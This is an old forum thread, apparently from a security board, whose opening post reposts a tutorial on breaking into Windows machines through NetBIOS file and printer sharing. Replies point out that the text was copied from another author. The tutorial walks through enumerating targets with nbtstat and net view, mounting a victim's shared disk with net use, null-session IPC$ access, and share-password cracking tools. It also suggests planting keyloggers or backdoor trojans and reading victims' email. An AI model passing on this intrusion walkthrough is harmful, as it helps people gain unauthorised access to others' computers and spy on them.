View Poll Results: Which MMORPG will take over the future?

Voters
1. You may not vote on this poll
  • Darkfall

0 0%
  • Age of Conan

1 100.00%
  • Planeshift - Still in Alpha/Beta

0 0%
  • Warhammer Online

0 0%
  • StarTrek Online

0 0%
  • Renaissance

0 0%
  • Lord of the Rings Online

0 0%
  • Other

0 0%

Thread: NetBIOS based hacking by Bob

Cool NetBIOS based hacking by Bob

[NetBIOS based hacking by Bob]
    Hacking Shared Resources - The Windows Loophole

Dear reader's I have written this tutorial keeping in mind that you might ,after reding posses basic knowledge of how hackers use NetBIOS as a tool for hacking. Using NetBIOS for hacking is the probably the easiest way to hack remotely any pc connected to the internet ,that has enabled File and printer sharing over its LAN.
    What is NetBIOS ?

NetBIOS (Network Basic Input/Output System) was originally developed by IBM and Sytek as an Application Programming Interface (API) for client software to access LAN resources.

In a basic sense, NetBIOS allows applications to talk to the network. Its intention is to isolate application programs from any type of hardware dependancies.PC's on a NetBIOS LAN communicate either by establishing a session or by using NetBIOS datagram or broadcast methods.NetBIOS is supported on Ethernet, TokenRing, and IBM PC Networks.Printers and folders also are shared using NetBIOS in a network.

For a quick look at a servers registered NetBIOS names and services, issue the following NBTSTAT command:

Run this command at (MS DOS) prompt:
    nbtstat -A [ipaddress]
    ex:nbtstat -A 127.0.0.1

The Problem :

1) NetBIOS (Microsoft Networking) over TCP/IP can present a serious security risk.Unlike the Internet, any computer on a NetBIOS network can gather name, address and resource information and distribute such info to others. Because of this, simple peer-to-peer networking is very easy to implement between any two NetBIOS-equipped machines.Windows resources can be readily shared with other machines across the Internet.

2) Managing Shared Resources{The Windows Loophole }-- This means that when a home user sets up his own LAN using Microsoft's simple, handy, built-in networking, and if that user turns on file sharing, his shared resources immediately become available over the existing dial-up or other link to the Internet.

In most cases, users are warned by Windows and can avoid trouble. Shared resources are also easily protected with passwords. But on a tiny home network or in a small business, passwords may often be omitted on the assumption all users are trusted, and in some cases, the user may be unaware of the risk.

The warning reads: File and printer sharing is running on the TCP/IP connection you
    will use to access the Internet. Other users on the Internet
    might be able to access your files.

Would you like Windows to disable file and printer sharing on the
    TCP/IP connection to the Internet?
    A similar warning was implemented for NT. In more recent NT versions (4.x), it is now virtually impossible to set up open file shares, and it cannot be done by accident.

3) When a printer is shared on a Win9x machine, Windows creates a hidden system share called PRINTER$ which grants no-password-required read-only access to the WINDOWS\SYSTEM folder and all its subfolders.I know of no way to prevent Windows from creating this hidden share when a printer is shared, and I know no way to password-protect its access. Also unfortunately, as far as I know printer sharing in particular cannot be turned off on a per-device basis; it can only be disabled globally. If your Win9x system is on a LAN and you share a printer, and if you also share resources on the public Net, this hidden share will be accessible on the Internet link by default.While access to this share is read-only and therefore an intruder can't engage in any direct mischief; a great deal can often be determined about a system and/or its users by reading the information in this folder.

HOW HACKER'S USE NetBIOS
    (Using WINDOWS 9X Machine)

THE NBTSTAT COMMAND

You can manually interact with the NetBIOS with the help of NBTSTAT command. To use this command click on the start button then select RUN... and type "command" without quotes to launch MS-DOS Command Prompt. Alternatively you may click on Start Button then go to Programs and then select Command Prompt. Once you are in Command Prompt you can exit by typing command EXIT . To launch Command Prompt in full screen mode press ALT+ENTER key combination .To get back to the original window again press ALT+ENTER key combination. If you have launched the command prompt you will get

c:\windows>

If you do not get windows displayed after c:\ don't worry just keep going , all required commands will work fine.

Now lets play with the NBTSTAT command.

If you want to get more help from MS-DOS about this command type NBTSTAT/? on the prompt i.e.

c:\windows>nbtstat/?

If you want to get the NetBIOS information of your computer type the following command

c:\windows>nbtstat -a 127.0.0.1

This command will list the NetBIOS information. A typical example

NetBIOS Remote Machine Name Table

Name Number Type Usage

==========================================================================

workgroup 00 G Domain Name

my_computer 03 U Messenger Service

myusername 03 U Messenger Service

MAC Address = 00-02-44-14-23-E6

Please note that we have used our ip address to be 127.0.0.1 . This ip address is called as "Loop Back" ip address because this ip address always refers to the computer you are using.

This example is self explanatory . We need not go in details. We need to know about the Name and Number. The Name displays the Name of the NetBIOS and there is a corresponding hexagonal number . You may see some additional names in your case.

If you want to get the NetBIOS names of a remote computer, the command is

c:\windows>nbtstat -a ipaddress

Example - To get the NetBIOS names of a computer having ip address 203.195.136.156, we shall use the command

NOTE-203.195.136.156 may be a active ip address of someone's computer. I am using it only as an example. Please don't hack this computer.

c:\windows>nbtstat -a 203.195.136.156

WHAT YOU NEED TO HACK

All you need is a Windows based operating system like Windows 98 and Me (but I prefer Windows NT, 2000, XP) and an internet connection.

TYPES OF ATTACKS

We can launch two types of attack on the remote computer having NetBIOS.

1. Reading/Writing to a remote computer system

2. Denial of Service

Searching for a victim

You may manually search for the victims by first using the nbtstat -a ipaddress and then net view \\ipaddress . If at first you don't succeed step to next ip address until you find a suitable ip address. You may also use a port scanner .A port scanner is simply a software that can search for any block of ip address say 192.168.0.1 to 192.168.0.255 for one or more ports. "R3x" is a port scanner that gives NetBIOS names of the remote computer.

Lets Hack -Part 1 Remotely reading/writing to a victim's computer

Believe it or not but NetBIOS is the easiest method to break into somebody's computer. However there is a condition that must be satisfied before you can hack. The condition is that the victim must have enabled File And Printer Sharing on his computer. If the victim has enabled it , the nbtstat command will display one more NetBIOS name. Now lets us take a example. Suppose you know a ip address that has enabled File And Printer Sharing and let suppose the ip address happens to be 203.195.136.156 .

The command that you will use to view the NetBIOS name is

c:\windows>nbtstat -a 203.195.136.156

Let suppose that the output comes out to be

NetBIOS Remote Machine Name Table

Name Type Status
    -------------------------------------------------------------------------------------------------
    user <00> UNIQUE Registered
    workgroup <00> GROUP Registered
    user <03> UNIQUE Registered
    user <20> UNIQUE Registered

MAC Address = 00-02-44-14-23-E6

The number <20> shows that the victim has enabled the File And Printer Sharing.
    The number <03> shows that the victim has enabled Messenger Service
    The number <00> shows that the victim has enabled Workstation Service

-------------------------------------------------------------------------------------------------------------------------------------------------------------

NOTE - If you do not get this number there are two possibilities

1. You do not get the number <20> . This shows that the victim has not enabled the File And Printer Sharing .

2. You get "Host Not found" . This shows that the port 139 is closed or the ip address doesn't exists.

---------------------------------------------------------------------------------------------------------

If the number <20> is enabled our next step would be to view the drive or folders the victim is sharing.

We will use command

c:\windows>net view \\203.195.136.156

Let suppose we get the following output

Shared resources at \\203.195.136.156
    ComputerNameGoesHere

Share name Type Used as Comment

-----------------------------------------------------------------------------------------------
    CDISK Disk

The command completed successfully.

"DISK" shows that the victim is sharing a Disk named as CDISK . You may also get some additional information like

Shared resources at \\203.195.136.156

ComputerNameGoesHere

Share name Type Used as Comment

-----------------------------------------------------------------------------------------------
    HP-6L Print

"Print " shows that the victim is sharing a printer named as HP-6L

If we are able to share the victims hard disks or folders or printers we will be able to read write to the folders or hard disks or we may also be able to print anything on a remote printer ! Now let us share the victims computer's hard disk or printer.

Till now we know that there is a computer whose ip address happens to be 203.195.136.156 and on that computer File and printer sharing is enabled and the victim's hard disk 's name is CDISK.

Now we will connect our computer to that hard disk . After we have connected successfully a drive will be created on our computer and on double clicking on it we will be able to view the contents of the drive. If we have connected our newly formed drive to the victim's share name CDISK it means that we our drive will have the same contents as that of the CDISK .

Lets do it.

We will use the NET command to do our work .

Let suppose we want to make a drive k: on our computer and connect it to victim's share we will issue the command

c:\windows>net use k: \\203.195.136.156\CDISK

You may replace k letter by any other letter.

If the command is successful we will get the confirmation - The command was completed successfullly

The command was completed successfully

Now just double click on the My Computer icon on your desktop and you will be a happy hacker!

We have just crested a new drive k: . Just open windows Explorer and you will find that you are able to access the remote computer's hard disk. Enjoy your first hack!

GO TO CONTENTS

Cracking Share passwords

Sometimes when we use "net use k: \\ipaddress\sharename" we are asked for a password. There is a password cracker "PQWAK" . All you have to enter ip address and the share name and it will decrypt the password within seconds. Please note that this can crack only the passwords is the remote operating system is running on -

Windows 95

Windows 98

Windows Me

GO TO CONTENTS

Using IPC$ to hack Windows NT,2000,XP

Now you must be thinking of something that can crack share passwords on NT based operating systems like Windows NT and Windows 2000.

IPC$ is there to help us. It is not at all a password cracker . It is simply a string that tells the remote operating system to give guest access that is give access without asking for password.

We hackers use IPC$ in this way

c:\windows>net use k: \\123.123.123.123\ipc$ "" /user:""

You may replace k letter by any other letter. If you replace it by "b" (type without quotes) a new drive will be created by a drive letter b.

Please note that you won't be able to get access to victim's shared drives but you you can gather valuable information like names of all the usernames, users that have never logged, and other such information. One such tool that uses the ipc$ method is "Internet Periscope". Another tool is "enum" - its my favorite toot however it is run on command promt.

GO TO CONTENTS

Penetrating in to the victim's computer

Now that you have access to a remote computer you may be interested in viewing his secret emails, download hismp3 songs , and more...

But if you think like a hard core hacker you would like to play some dirty tricks like you may wish to install a key logger or install a back door entry Trojan like netbus and backorifice or delete or copy some files. All these tasks involves writing to victim's hard disk . For this you need to have write access permission.

Smile

I bet this Tutorial will soon be hidden...

Cheers,
    B.B

Good tut! I dont mean to undermind your work but, crapy topic. I've read probibly about a million of these. I could write a batch file to do the 'rooting' right here off the top of my head. Theres millions of simple 'rootkits' out there for netbios. I dont even think this is really hacking. Just my $0.02. Again, not to be a *****
    meh. -ech0.

Hmmm?

GO TO CONTENTS
    why does that appear several times in this post, yet there are no "contents" listed?

why does that appear several times in this post, yet there are no "contents" listed?
    Because a lot of it seems to have been pasted from NETBIOS BASED HACKING TUTORIAL BY GAURAV KUMAR ?
    " And maddest of all, to see life as it is and not as it should be" --Miguel Cervantes

LOL, that would explain the goto contents!

Atleast edit a tutorial if your going to cut and paste it!

Originally posted here by nihil
    Hmmm?

Straightforward, a blindly copy/pasted material ..... he did not bother editing {excluding the Auother name} .... IKnowNot's link answers this question ....

I wounder if he will ever write a tutorial?.... I wounder how he could copy/paste it in a new thread? Too lazy bob ............
    \"The only truly secure system is one that is powered off, cast in a block of concrete and sealed in a lead-lined room with armed guards - and even then I have my doubts\".....Spaf
    Everytime I learn a new thing, I discover how ignorant I am.- ... Black Cluster